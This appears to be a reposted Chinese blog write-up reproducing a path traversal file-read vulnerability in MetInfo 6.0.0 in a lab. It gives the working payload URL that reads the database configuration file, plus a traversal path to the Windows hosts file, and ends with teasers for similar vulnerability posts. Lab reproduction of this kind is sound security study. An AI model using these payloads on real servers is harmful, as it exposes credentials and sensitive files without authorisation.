Metinfo6.0.0任意文件读取漏洞复现

9月前作者：blackK_YC 分类：Toy博客阅读(32) 违法举报

这篇具有很好参考价值的文章主要介绍了Metinfo6.0.0任意文件读取漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

漏洞原理

在\MetInfo6.0.0\app\system\include\module\的old_thumb.class.php文件

Metinfo6.0.0任意文件读取漏洞复现,网络安全

可以看到这里对./进行了严格的过滤，但是却忽略了在Windows下还可以用…\来跳转目录

环境搭建

下载Metinfo6.0.0

Metinfo6.0.0任意文件读取漏洞复现,网络安全

配置随便写，自己记住就行

Metinfo6.0.0任意文件读取漏洞复现,网络安全

这里前面已经审计过代码了，就直接上payload了

http://10.9.75.161/MetInfo6.0.0/include/thumb.php?dir=http\..\..\config\config_db.php

Metinfo6.0.0任意文件读取漏洞复现,网络安全

还可以访问其他文件

..\..\..\..\..\Windows\System32\drivers\etc\hosts

Metinfo6.0.0任意文件读取漏洞复现,网络安全文章来源地址https://www.toymoban.com/news/detail-689815.html

到了这里，关于Metinfo6.0.0任意文件读取漏洞复现的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

任意文件读取和漏洞复现

一些网站的需求，可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过，就可以查看或下载任意文件。这些文件可以是漂代码文件，配置文件，敏感文件等等。任意文件读取会造成（敏感）信息泄露：任意文件读取大多数情况是由于其他

2024年02月09日
浏览(39)
【漏洞复现】OfficeWeb365 Indexs 任意文件读取漏洞

OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞，攻击者可通过独特的加密方式对payload进行加密，读取任意文件，获取服务器敏感信息，使系统处于极不安全的状态。 FOFA：body=\\\"请输入furl参数\\\" || header=\\\"OfficeWeb365\\\" || banner=\\\"OfficeWeb365\\\" 读取文件加密方式

2024年02月02日
浏览(45)
Jenkins CLI 任意文件读取漏洞复现

Jenkins CLI 是 Jenkins 内置的命令行页面。 Jenkins 受影响版本中使用 args4j 库解析CLI命令参数，该库默认将参数中 @ 字符后的文件路径替换为文件内容，未授权的攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进

2024年02月22日
浏览(51)
OfficeWeb365 Indexs 任意文件读取漏洞复现

OfficeWeb365 是专注于 Office 文档在线预览及PDF文档在线预览云服务，包括 Microsoft Word 文档在线预览、Excel 表格在线预览、Powerpoint 演示文档在线预览，WPS 文字处理、WPS 表格、WPS 演示及 Adobe PDF 文档在线预览。 OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞，攻击者可通过独特

2024年02月03日
浏览(37)
漏洞复现-Yearning front 任意文件读取漏洞（附漏洞检测脚本）

文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担

2024年01月18日
浏览(39)
用友NC word.docx 任意文件读取漏洞复现

用友NC是一款企业级ERP软件。作为一种信息化管理工具，用友NC提供了一系列业务管理模块，包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等，帮助企业实现数字化转型和高效管理。用友NC 系统word.docx等接口存在任意文件读取漏洞，未经身份认证

2024年01月25日
浏览(30)
officeWeb365 Indexs接口存在任意文件读取漏洞复现

OfficeWeb365 是专注于 Office 文档在线预览及PDF文档在线预览云服务，包括 Microsoft Word 文档在线预览、Excel 表格在线预览、Powerpoint 演示文档在线预览，WPS 文字处理、WPS 表格、WPS 演示及 Adobe PDF 文档在线预览。OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞，攻击者可通过独特

2024年02月20日
浏览(39)
IP-guard WebServer 任意文件读取漏洞复现

IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件，旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。由于IP-guard WebServer /ipg/static/appr/lib/flexpaper/php/view.php接口处未对用户输入的数据进行严格的校验和过滤。未经身份验证的攻击者可

2024年04月12日
浏览(38)
网络安全-kkFileViews任意文件读取漏洞原理解析

在学习的过程中，了解到kkFileView存在任意文件读取、SSRF、文件上传漏洞。为了更深刻的理解其原理，我从git拉取了项目，由于该漏洞在最新版本已经修复，所以这只是历史版本中存在的。写这篇文章来提醒自己代码中容易出问题的地方。来到kkFileView官网，发现支持Gitee，

2024年04月11日
浏览(37)
【漏洞复现】泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现

泛微e-office OfficeServer2.php 存在任意文件读取漏洞，攻击者可通过构造特定Payload获取敏感数据信息。请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果

2024年02月09日
浏览(51)